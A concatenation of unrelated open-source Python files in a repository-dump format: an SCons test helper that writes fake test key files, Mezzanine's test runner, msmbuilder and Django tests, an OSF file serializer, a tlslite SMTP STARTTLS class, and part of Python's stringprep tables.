LLE9zUGKBTvHeaWVjHhDh66dWS9ss6pXcVrElSgZVlBTg6jZgvxV27A=
"""))
def FakeWindowsPVK(self, filename):
"""Write out a fake private key file."""
# Generated with:
# makecert.exe -r -sv fake.pvk -n "CN=fakeco" fake.cer (password: secret)
self.write(filename, base64.b64decode("""
HvG1sAAAAAACAAAAAQAAABAAAABUAgAAHXQX+j2ePmaFlOVCODMBigcCAAAAJAAA6tHDlTGLFBkD
JbgKswhpzNuqXFUxW3ZYGQb5oH9wy5UCpIddroTpfpM8y7PMz1YWCJ2ijqIdAksv3qc9pV5xlRyF
YalQoLXPn9wklkYMbl2zBQAXnDgCy3JWa07tjCIMelieKQNzsCkTHq3iPpuF/IeL+q8o0AtxizK/
SeKLVc3VXH9F6L3pIKFud0UwvFD2Phea8OhWkTsRdz9kQTKXgW2ScIhEqea9w04jY/7bOJJB9JzQ
75beIS3inuKD7r/Ynf2VJzI+AGY0Zkyq48Pmjx9yGBuMId0T4o8K4pSfQiWc5NLfLP6Jz7IzAUHW
+r+9X/8p84IA5YNMeWYommfxjwHl6r0R4UOQaA2hseoq+Tqf6B6lfuWYCrZl7u8D/VYvyYWlImWg
G3jJyRUwDKAyZ6/hTdGU7mlcRPMjAvg4CyWQCp9CLT4JziRxEaoQWbKQLDcVIGMqmytqujbuZBtl
hR1v571uD7daAW8iKPhjkaBjAALa7kmzDIS8DY7YuMAmvV7stzBW8q/eLakmN9UWnlmpDHeCEmuj
tjXhDIONv7j63So8W3B5umRJMD8eM4rC0/9Pu1e2BVlPc6J5Dgo1ZGCKmdtb8zzv0Ea7xlc2ZLU+
lqdiYR6DgsEH6gvjLzYK491yQMCbC9l9lOwhLHTGrtHsXKZyM4Puid3ODAkHlMZy4D9feWakVhpS
DmB7w6ikflbPvsx200M9FMbXkcXkT6LMFmye4D8uCaooPYJDrBLVFi9gbAXtRj8WJ2+hRefzG5+N
pEUUTCf3tuiV
"""))
def FakeWindowsPFX(self, filename):
"""Write out a fake windows certificate + private key file."""
# Generated using:
# makecert.exe -r -sv fake.pvk -n "CN=fakeco" fake.cer (password: secret)
# pvk2pfx.exe -pvk fake.pvk -spc fake.cer -pfx fake.pfx -po obscure
self.write(filename, base64.b64decode("""
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
"""))
def match_visible(self, str1, str2):
"""Returns true if the strings look the same.
Args:
str1: First string to compare.
str2: Seconds string to compare.
Returns:
True if the strings are the same, after stripping trailing whitespace
from lines. That is, if they look them same when printed to a terminal.
"""
# Add a newline at end of the strings, in case strings have trailing
# whitespace but no newline at the end.
str1 = re.sub('[ \t\r]*\n', '\n', str1 + '\n')
str2 = re.sub('[ \t\r]*\n', '\n', str2 + '\n')
return str1 == str2
def WriteSConscript(self, filename, function, python_paths=None):
"""Writes a SConscript which will call the function.
Args:
filename: Destination filename.
function: Function to call from SConscript. This will be passed the
globals() dict from the SConscript.
python_paths: List of additional python paths to include in sys.path
for SConscript.
If the function needs access to SCons functions or variables, it should
get them from the passed globals dict:
def MySConscript(scons_globals):
Environment = scons_globals['Environment']
...
Returns:
Passthrough return from self.write().
"""
if python_paths is None:
python_paths = []
func_path, func_file = os.path.split(function.func_code.co_filename)
python_paths += [
# Directory containing the module with the function to call
func_path,
# Directory containing THIS module, since the module calling it most
# likely imports it, and the path to the TestCommon module, since this
# file imports it.
os.path.dirname(__file__),
os.path.dirname(TestCommon.__file__),
]
data = ('# SConscript file '
'automatically created by TestFramework.WriteSConscript().\n'
'import sys\n')
for p in python_paths:
# Need to turn backslashes into forward-slashes, since we're writing a
# string into a python source file. (Could alternately double-up the
# backslashes.)
data += 'sys.path.append("%s")\n' % p.replace('\\', '/')
data += 'from %s import %s\n%s(globals())\n' % (
os.path.splitext(func_file)[0],
function.__name__,
function.__name__
)
return self.write(filename, data)
| bsd-3-clause |
nikolas/mezzanine | mezzanine/bin/runtests.py | 34 | 2233 | from __future__ import unicode_literals
import atexit
import os
import shutil
import sys
import django
def main(package="mezzanine"):
"""
This is the main test function called via ``python setup.py test``.
It's responsible for hacking the ``project_template`` dir into
an actual project to test against.
"""
from mezzanine.utils.importing import path_for_import
package_path = path_for_import(package)
project_path = os.path.join(package_path, "project_template")
os.environ["DJANGO_SETTINGS_MODULE"] = "project_name.test_settings"
project_app_path = os.path.join(project_path, "project_name")
local_settings_path = os.path.join(project_app_path, "local_settings.py")
test_settings_path = os.path.join(project_app_path, "test_settings.py")
sys.path.insert(0, package_path)
sys.path.insert(0, project_path)
if not os.path.exists(test_settings_path):
shutil.copy(local_settings_path + ".template", test_settings_path)
with open(test_settings_path, "r") as f:
local_settings = f.read()
with open(test_settings_path, "w") as f:
test_settings = """
from . import settings
globals().update(i for i in settings.__dict__.items() if i[0].isupper())
# Require the mezzanine.accounts app. We use settings.INSTALLED_APPS here so
# the syntax test doesn't complain about an undefined name.
if "mezzanine.accounts" not in settings.INSTALLED_APPS:
INSTALLED_APPS = list(settings.INSTALLED_APPS) + ["mezzanine.accounts"]
# Use the MD5 password hasher by default for quicker test runs.
PASSWORD_HASHERS = ('django.contrib.auth.hashers.MD5PasswordHasher',)
"""
f.write(test_settings + local_settings)
def cleanup_test_settings():
import os # Outer scope sometimes unavailable in atexit functions.
for fn in [test_settings_path, test_settings_path + 'c']:
try:
os.remove(fn)
except OSError:
pass
atexit.register(cleanup_test_settings)
django.setup()
from django.core.management.commands import test
sys.exit(test.Command().execute(verbosity=1))
if __name__ == "__main__":
main()
| bsd-2-clause |
stephenliu1989/msmbuilder | msmbuilder/tests/test_featurizer.py | 1 | 3123 | import numpy as np
from mdtraj import compute_dihedrals, compute_phi
from mdtraj.testing import eq
from msmbuilder.example_datasets import fetch_alanine_dipeptide
from msmbuilder.featurizer import get_atompair_indices, FunctionFeaturizer, \
DihedralFeaturizer, AtomPairsFeaturizer, SuperposeFeaturizer, \
RMSDFeaturizer, VonMisesFeaturizer, Slicer
def test_function_featurizer():
dataset = fetch_alanine_dipeptide()
trajectories = dataset["trajectories"]
trj0 = trajectories[0]
# use the dihedral to compute phi for ala
atom_ind = [[4, 6, 8, 14]]
func = compute_dihedrals
# test with args
f = FunctionFeaturizer(func, func_args={"indices": atom_ind})
res1 = f.transform([trj0])
# test with function in a fucntion without any args
def funcception(trj):
return compute_phi(trj)[1]
f = FunctionFeaturizer(funcception)
res2 = f.transform([trj0])
# know results
f3 = DihedralFeaturizer(['phi'], sincos=False)
res3 = f3.transform([trj0])
# compare all
for r in [res2, res3]:
np.testing.assert_array_almost_equal(res1, r)
def test_that_all_featurizers_run():
# TODO: include all featurizers, perhaps with generator tests
dataset = fetch_alanine_dipeptide()
trajectories = dataset["trajectories"]
trj0 = trajectories[0][0]
atom_indices, pair_indices = get_atompair_indices(trj0)
featurizer = AtomPairsFeaturizer(pair_indices)
X_all = featurizer.transform(trajectories)
featurizer = SuperposeFeaturizer(np.arange(15), trj0)
X_all = featurizer.transform(trajectories)
featurizer = DihedralFeaturizer(["phi", "psi"])
X_all = featurizer.transform(trajectories)
featurizer = VonMisesFeaturizer(["phi", "psi"])
X_all = featurizer.transform(trajectories)
# Below doesn't work on ALA dipeptide
# featurizer = msmbuilder.featurizer.ContactFeaturizer()
# X_all = featurizer.transform(trajectories)
featurizer = RMSDFeaturizer(trj0)
X_all = featurizer.transform(trajectories)
def test_von_mises_featurizer():
dataset = fetch_alanine_dipeptide()
trajectories = dataset["trajectories"]
featurizer = VonMisesFeaturizer(["phi", "psi"], n_bins=18)
X_all = featurizer.transform(trajectories)
n_frames = trajectories[0].n_frames
assert X_all[0].shape == (n_frames, 36), ("unexpected shape returned: (%s, %s)" %
X_all[0].shape)
featurizer = VonMisesFeaturizer(["phi", "psi"], n_bins=10)
X_all = featurizer.transform(trajectories)
assert X_all[0].shape == (n_frames, 20), ("unexpected shape returned: (%s, %s)" %
X_all[0].shape)
def test_slicer():
X = ([np.random.normal(size=(50, 5), loc=np.arange(5))]
+ [np.random.normal(size=(10, 5), loc=np.arange(5))])
slicer = Slicer(index=[0, 1])
Y = slicer.transform(X)
eq(len(Y), len(X))
eq(Y[0].shape, (50, 2))
slicer = Slicer(first=2)
Y2 = slicer.transform(X)
eq(len(Y2), len(X))
eq(Y2[0].shape, (50, 2))
eq(Y[0], Y2[0])
eq(Y[1], Y2[1])
| lgpl-2.1 |
willharris/django | tests/validation/test_error_messages.py | 398 | 3642 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.db import models
class ValidationMessagesTest(TestCase):
def _test_validation_messages(self, field, value, expected):
with self.assertRaises(ValidationError) as cm:
field.clean(value, None)
self.assertEqual(cm.exception.messages, expected)
def test_autofield_field_raises_error_message(self):
f = models.AutoField(primary_key=True)
self._test_validation_messages(f, 'fõo',
["'fõo' value must be an integer."])
def test_integer_field_raises_error_message(self):
f = models.IntegerField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be an integer."])
def test_boolean_field_raises_error_message(self):
f = models.BooleanField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be either True or False."])
def test_float_field_raises_error_message(self):
f = models.FloatField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be a float."])
def test_decimal_field_raises_error_message(self):
f = models.DecimalField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be a decimal number."])
def test_null_boolean_field_raises_error_message(self):
f = models.NullBooleanField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be either None, True or False."])
def test_date_field_raises_error_message(self):
f = models.DateField()
self._test_validation_messages(f, 'fõo',
["'fõo' value has an invalid date format. "
"It must be in YYYY-MM-DD format."])
self._test_validation_messages(f, 'aaaa-10-10',
["'aaaa-10-10' value has an invalid date format. "
"It must be in YYYY-MM-DD format."])
self._test_validation_messages(f, '2011-13-10',
["'2011-13-10' value has the correct format (YYYY-MM-DD) "
"but it is an invalid date."])
self._test_validation_messages(f, '2011-10-32',
["'2011-10-32' value has the correct format (YYYY-MM-DD) "
"but it is an invalid date."])
def test_datetime_field_raises_error_message(self):
f = models.DateTimeField()
# Wrong format
self._test_validation_messages(f, 'fõo',
["'fõo' value has an invalid format. It must be "
"in YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] format."])
# Correct format but invalid date
self._test_validation_messages(f, '2011-10-32',
["'2011-10-32' value has the correct format "
"(YYYY-MM-DD) but it is an invalid date."])
# Correct format but invalid date/time
self._test_validation_messages(f, '2011-10-32 10:10',
["'2011-10-32 10:10' value has the correct format "
"(YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]) "
"but it is an invalid date/time."])
def test_time_field_raises_error_message(self):
f = models.TimeField()
# Wrong format
self._test_validation_messages(f, 'fõo',
["'fõo' value has an invalid format. It must be in "
"HH:MM[:ss[.uuuuuu]] format."])
# Correct format but invalid time
self._test_validation_messages(f, '25:50',
["'25:50' value has the correct format "
"(HH:MM[:ss[.uuuuuu]]) but it is an invalid time."])
| bsd-3-clause |
adlius/osf.io | api/wb/serializers.py | 11 | 2578 | from django.db import IntegrityError
from rest_framework import serializers as ser
from rest_framework import exceptions
from website.files import exceptions as file_exceptions
from api.base.serializers import IDField
class DestinationSerializer(ser.Serializer):
parent = ser.CharField(write_only=True)
target = ser.CharField(write_only=True)
name = ser.CharField(write_only=True, allow_blank=True, allow_null=True)
class WaterbutlerMetadataSerializer(ser.Serializer):
source = ser.CharField(write_only=True)
destination = DestinationSerializer(write_only=True)
id = IDField(source='_id', read_only=True)
kind = ser.CharField(read_only=True)
name = ser.CharField(read_only=True, help_text='Display name used in the general user interface')
created = ser.CharField(read_only=True)
modified = ser.CharField(read_only=True)
path = ser.CharField(read_only=True)
checkout = ser.SerializerMethodField(read_only=True)
version = ser.IntegerField(help_text='Latest file version', read_only=True, source='current_version_number')
downloads = ser.SerializerMethodField()
sha256 = ser.SerializerMethodField()
md5 = ser.SerializerMethodField()
size = ser.SerializerMethodField()
def get_checkout(self, obj):
return obj.checkout._id if obj.checkout else None
def get_downloads(self, obj):
return obj.get_download_count()
def get_sha256(self, obj):
return obj.versions.first().metadata.get('sha256', None) if obj.versions.exists() else None
def get_md5(self, obj):
return obj.versions.first().metadata.get('md5', None) if obj.versions.exists() else None
def get_size(self, obj):
if obj.versions.exists():
self.size = obj.versions.first().size
return self.size
return None
def create(self, validated_data):
source = validated_data.pop('source')
destination = validated_data.pop('destination')
name = validated_data.pop('name')
try:
return self.context['view'].perform_file_action(source, destination, name)
except IntegrityError:
raise exceptions.ValidationError('File already exists with this name.')
except file_exceptions.FileNodeCheckedOutError:
raise exceptions.ValidationError('Cannot move file as it is checked out.')
except file_exceptions.FileNodeIsPrimaryFile:
raise exceptions.ValidationError('Cannot move file as it is the primary file of preprint.')
class Meta:
type_ = 'file_metadata'
| apache-2.0 |
ioef/tlslite-ng | tlslite/integration/smtp_tls.py | 115 | 2985 | # Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
"""TLS Lite + smtplib."""
from smtplib import SMTP
from tlslite.tlsconnection import TLSConnection
from tlslite.integration.clienthelper import ClientHelper
class SMTP_TLS(SMTP):
"""This class extends L{smtplib.SMTP} with TLS support."""
def starttls(self,
username=None, password=None,
certChain=None, privateKey=None,
checker=None,
settings=None):
"""Puts the connection to the SMTP server into TLS mode.
If the server supports TLS, this will encrypt the rest of the SMTP
session.
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
you can do certificate-based server
authentication with one of these argument combinations:
- x509Fingerprint
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication.
The caller should be prepared to handle TLS-specific
exceptions. See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type username: str
@param username: SRP username. Requires the
'password' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.x509certchain.X509CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP arguments.
@type privateKey: L{tlslite.utils.rsakey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP arguments.
@type checker: L{tlslite.checker.Checker}
@param checker: Callable object called after handshaking to
evaluate the connection and raise an Exception if necessary.
@type settings: L{tlslite.handshakesettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
"""
(resp, reply) = self.docmd("STARTTLS")
if resp == 220:
helper = ClientHelper(
username, password,
certChain, privateKey,
checker,
settings)
conn = TLSConnection(self.sock)
helper._handshake(conn)
self.sock = conn
self.file = conn.makefile('rb')
return (resp, reply) | lgpl-2.1 |
houzhenggang/hiwifi-openwrt-HC5661-HC5761 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/root-ralink/usr/lib/python2.7/stringprep.py | 278 | 13522 | # This file is generated by mkstringprep.py. DO NOT EDIT.
"""Library that exposes various tables found in the StringPrep RFC 3454.
There are two kinds of tables: sets, for which a member test is provided,
and mappings, for which a mapping function is provided.
"""
from unicodedata import ucd_3_2_0 as unicodedata
assert unicodedata.unidata_version == '3.2.0'
def in_table_a1(code):
if unicodedata.category(code) != 'Cn': return False
c = ord(code)
if 0xFDD0 <= c < 0xFDF0: return False
return (c & 0xFFFF) not in (0xFFFE, 0xFFFF)
b1_set = set([173, 847, 6150, 6155, 6156, 6157, 8203, 8204, 8205, 8288, 65279] + range(65024,65040))
def in_table_b1(code):
return ord(code) in b1_set
b3_exceptions = {
0xb5:u'\u03bc', 0xdf:u'ss', 0x130:u'i\u0307', 0x149:u'\u02bcn',
0x17f:u's', 0x1f0:u'j\u030c', 0x345:u'\u03b9', 0x37a:u' \u03b9',
0x390:u'\u03b9\u0308\u0301', 0x3b0:u'\u03c5\u0308\u0301', 0x3c2:u'\u03c3', 0x3d0:u'\u03b2',
0x3d1:u'\u03b8', 0x3d2:u'\u03c5', 0x3d3:u'\u03cd', 0x3d4:u'\u03cb',
0x3d5:u'\u03c6', 0x3d6:u'\u03c0', 0x3f0:u'\u03ba', 0x3f1:u'\u03c1',
0x3f2:u'\u03c3', 0x3f5:u'\u03b5', 0x587:u'\u0565\u0582', 0x1e96:u'h\u0331',
0x1e97:u't\u0308', 0x1e98:u'w\u030a', 0x1e99:u'y\u030a', 0x1e9a:u'a\u02be',
0x1e9b:u'\u1e61', 0x1f50:u'\u03c5\u0313', 0x1f52:u'\u03c5\u0313\u0300', 0x1f54:u'\u03c5\u0313\u0301',
0x1f56:u'\u03c5\u0313\u0342', 0x1f80:u'\u1f00\u03b9', 0x1f81:u'\u1f01\u03b9', 0x1f82:u'\u1f02\u03b9',
0x1f83:u'\u1f03\u03b9', 0x1f84:u'\u1f04\u03b9', 0x1f85:u'\u1f05\u03b9', 0x1f86:u'\u1f06\u03b9',
0x1f87:u'\u1f07\u03b9', 0x1f88:u'\u1f00\u03b9', 0x1f89:u'\u1f01\u03b9', 0x1f8a:u'\u1f02\u03b9',
0x1f8b:u'\u1f03\u03b9', 0x1f8c:u'\u1f04\u03b9', 0x1f8d:u'\u1f05\u03b9', 0x1f8e:u'\u1f06\u03b9',
0x1f8f:u'\u1f07\u03b9', 0x1f90:u'\u1f20\u03b9', 0x1f91:u'\u1f21\u03b9', 0x1f92:u'\u1f22\u03b9',
0x1f93:u'\u1f23\u03b9', 0x1f94:u'\u1f24\u03b9', 0x1f95:u'\u1f25\u03b9', 0x1f96:u'\u1f26\u03b9',
0x1f97:u'\u1f27\u03b9', 0x1f98:u'\u1f20\u03b9', 0x1f99:u'\u1f21\u03b9', 0x1f9a:u'\u1f22\u03b9',
0x1f9b:u'\u1f23\u03b9', 0x1f9c:u'\u1f24\u03b9', 0x1f9d:u'\u1f25\u03b9', 0x1f9e:u'\u1f26\u03b9',
0x1f9f:u'\u1f27\u03b9', 0x1fa0:u'\u1f60\u03b9', 0x1fa1:u'\u1f61\u03b9', 0x1fa2:u'\u1f62\u03b9',
0x1fa3:u'\u1f63\u03b9', 0x1fa4:u'\u1f64\u03b9', 0x1fa5:u'\u1f65\u03b9', 0x1fa6:u'\u1f66\u03b9',
0x1fa7:u'\u1f67\u03b9', 0x1fa8:u'\u1f60\u03b9', 0x1fa9:u'\u1f61\u03b9', 0x1faa:u'\u1f62\u03b9',
0x1fab:u'\u1f63\u03b9', 0x1fac:u'\u1f64\u03b9', 0x1fad:u'\u1f65\u03b9', 0x1fae:u'\u1f66\u03b9',
0x1faf:u'\u1f67\u03b9', 0x1fb2:u'\u1f70\u03b9', 0x1fb3:u'\u03b1\u03b9', 0x1fb4:u'\u03ac\u03b9',
0x1fb6:u'\u03b1\u0342', 0x1fb7:u'\u03b1\u0342\u03b9', 0x1fbc:u'\u03b1\u03b9', 0x1fbe:u'\u03b9',
0x1fc2:u'\u1f74\u03b9', 0x1fc3:u'\u03b7\u03b9', 0x1fc4:u'\u03ae\u03b9', 0x1fc6:u'\u03b7\u0342',
0x1fc7:u'\u03b7\u0342\u03b9', 0x1fcc:u'\u03b7\u03b9', 0x1fd2:u'\u03b9\u0308\u0300', 0x1fd3:u'\u03b9\u0308\u0301',
0x1fd6:u'\u03b9\u0342', 0x1fd7:u'\u03b9\u0308\u0342', 0x1fe2:u'\u03c5\u0308\u0300', 0x1fe3:u'\u03c5\u0308\u0301',
0x1fe4:u'\u03c1\u0313', 0x1fe6:u'\u03c5\u0342', 0x1fe7:u'\u03c5\u0308\u0342', 0x1ff2:u'\u1f7c\u03b9',
0x1ff3:u'\u03c9\u03b9', 0x1ff4:u'\u03ce\u03b9', 0x1ff6:u'\u03c9\u0342', 0x1ff7:u'\u03c9\u0342\u03b9',
0x1ffc:u'\u03c9\u03b9', 0x20a8:u'rs', 0x2102:u'c', 0x2103:u'\xb0c',
0x2107:u'\u025b', 0x2109:u'\xb0f', 0x210b:u'h', 0x210c:u'h',
0x210d:u'h', 0x2110:u'i', 0x2111:u'i', 0x2112:u'l',
0x2115:u'n', 0x2116:u'no', 0x2119:u'p', 0x211a:u'q',
0x211b:u'r', 0x211c:u'r', 0x211d:u'r', 0x2120:u'sm',
0x2121:u'tel', 0x2122:u'tm', 0x2124:u'z', 0x2128:u'z',
0x212c:u'b', 0x212d:u'c', 0x2130:u'e', 0x2131:u'f',
0x2133:u'm', 0x213e:u'\u03b3', 0x213f:u'\u03c0', 0x2145:u'd',
0x3371:u'hpa', 0x3373:u'au', 0x3375:u'ov', 0x3380:u'pa',
0x3381:u'na', 0x3382:u'\u03bca', 0x3383:u'ma', 0x3384:u'ka',
0x3385:u'kb', 0x3386:u'mb', 0x3387:u'gb', 0x338a:u'pf',
0x338b:u'nf', 0x338c:u'\u03bcf', 0x3390:u'hz', 0x3391:u'khz',
0x3392:u'mhz', 0x3393:u'ghz', 0x3394:u'thz', 0x33a9:u'pa',
0x33aa:u'kpa', 0x33ab:u'mpa', 0x33ac:u'gpa', 0x33b4:u'pv',
0x33b5:u'nv', 0x33b6:u'\u03bcv', 0x33b7:u'mv', 0x33b8:u'kv',
0x33b9:u'mv', 0x33ba:u'pw', 0x33bb:u'nw', 0x33bc:u'\u03bcw',
0x33bd:u'mw', 0x33be:u'kw', 0x33bf:u'mw', 0x33c0:u'k\u03c9',
0x33c1:u'm\u03c9', 0x33c3:u'bq', 0x33c6:u'c\u2215kg', 0x33c7:u'co.',
0x33c8:u'db', 0x33c9:u'gy', 0x33cb:u'hp', 0x33cd:u'kk',
0x33ce:u'km', 0x33d7:u'ph', 0x33d9:u'ppm', 0x33da:u'pr',
0x33dc:u'sv', 0x33dd:u'wb', 0xfb00:u'ff', 0xfb01:u'fi',
0xfb02:u'fl', 0xfb03:u'ffi', 0xfb04:u'ffl', 0xfb05:u'st',
0xfb06:u'st', 0xfb13:u'\u0574\u0576', 0xfb14:u'\u0574\u0565', 0xfb15:u'\u0574\u056b',
0xfb16:u'\u057e\u0576', 0xfb17:u'\u0574\u056d', 0x1d400:u'a', 0x1d401:u'b',
0x1d402:u'c', 0x1d403:u'd', 0x1d404:u'e', 0x1d405:u'f',
0x1d406:u'g', 0x1d407:u'h', 0x1d408:u'i', 0x1d409:u'j',
0x1d40a:u'k', 0x1d40b:u'l', 0x1d40c:u'm', 0x1d40d:u'n',
0x1d40e:u'o', 0x1d40f:u'p', 0x1d410:u'q', 0x1d411:u'r',
0x1d412:u's', 0x1d413:u't', 0x1d414:u'u', 0x1d415:u'v',
0x1d416:u'w', 0x1d417:u'x', 0x1d418:u'y', 0x1d419:u'z',
0x1d434:u'a', 0x1d435:u'b', 0x1d436:u'c', 0x1d437:u'd',
0x1d438:u'e', 0x1d439:u'f', 0x1d43a:u'g', 0x1d43b:u'h',
0x1d43c:u'i', 0x1d43d:u'j', 0x1d43e:u'k', 0x1d43f:u'l',
0x1d440:u'm', 0x1d441:u'n', 0x1d442:u'o', 0x1d443:u'p',
0x1d444:u'q', 0x1d445:u'r', 0x1d446:u's', 0x1d447:u't',
0x1d448:u'u', 0x1d449:u'v', 0x1d44a:u'w', 0x1d44b:u'x',
0x1d44c:u'y', 0x1d44d:u'z', 0x1d468:u'a', 0x1d469:u'b',
0x1d46a:u'c', 0x1d46b:u'd', 0x1d46c:u'e', 0x1d46d:u'f',
0x1d46e:u'g', 0x1d46f:u'h', 0x1d470:u'i', 0x1d471:u'j',
0x1d472:u'k', 0x1d473:u'l', 0x1d474:u'm', 0x1d475:u'n',
0x1d476:u'o', 0x1d477:u'p', 0x1d478:u'q', 0x1d479:u'r',
0x1d47a:u's', 0x1d47b:u't', 0x1d47c:u'u', 0x1d47d:u'v',
0x1d47e:u'w', 0x1d47f:u'x', 0x1d480:u'y', 0x1d481:u'z',
0x1d49c:u'a', 0x1d49e:u'c', 0x1d49f:u'd', 0x1d4a2:u'g',
0x1d4a5:u'j', 0x1d4a6:u'k', 0x1d4a9:u'n', 0x1d4aa:u'o',
0x1d4ab:u'p', 0x1d4ac:u'q', 0x1d4ae:u's', 0x1d4af:u't',
0x1d4b0:u'u', 0x1d4b1:u'v', 0x1d4b2:u'w', 0x1d4b3:u'x',
0x1d4b4:u'y', 0x1d4b5:u'z', 0x1d4d0:u'a', 0x1d4d1:u'b',
0x1d4d2:u'c', 0x1d4d3:u'd', 0x1d4d4:u'e', 0x1d4d5:u'f',
0x1d4d6:u'g', 0x1d4d7:u'h', 0x1d4d8:u'i', 0x1d4d9:u'j',
0x1d4da:u'k', 0x1d4db:u'l', 0x1d4dc:u'm', 0x1d4dd:u'n',
0x1d4de:u'o', 0x1d4df:u'p', 0x1d4e0:u'q', 0x1d4e1:u'r',
0x1d4e2:u's', 0x1d4e3:u't', 0x1d4e4:u'u', 0x1d4e5:u'v',
0x1d4e6:u'w', 0x1d4e7:u'x', 0x1d4e8:u'y', 0x1d4e9:u'z',
0x1d504:u'a', 0x1d505:u'b', 0x1d507:u'd', 0x1d508:u'e',
0x1d509:u'f', 0x1d50a:u'g', 0x1d50d:u'j', 0x1d50e:u'k',
0x1d50f:u'l', 0x1d510:u'm', 0x1d511:u'n', 0x1d512:u'o',
0x1d513:u'p', 0x1d514:u'q', 0x1d516:u's', 0x1d517:u't',
0x1d518:u'u', 0x1d519:u'v', 0x1d51a:u'w', 0x1d51b:u'x',
0x1d51c:u'y', 0x1d538:u'a', 0x1d539:u'b', 0x1d53b:u'd',
0x1d53c:u'e', 0x1d53d:u'f', 0x1d53e:u'g', 0x1d540:u'i',
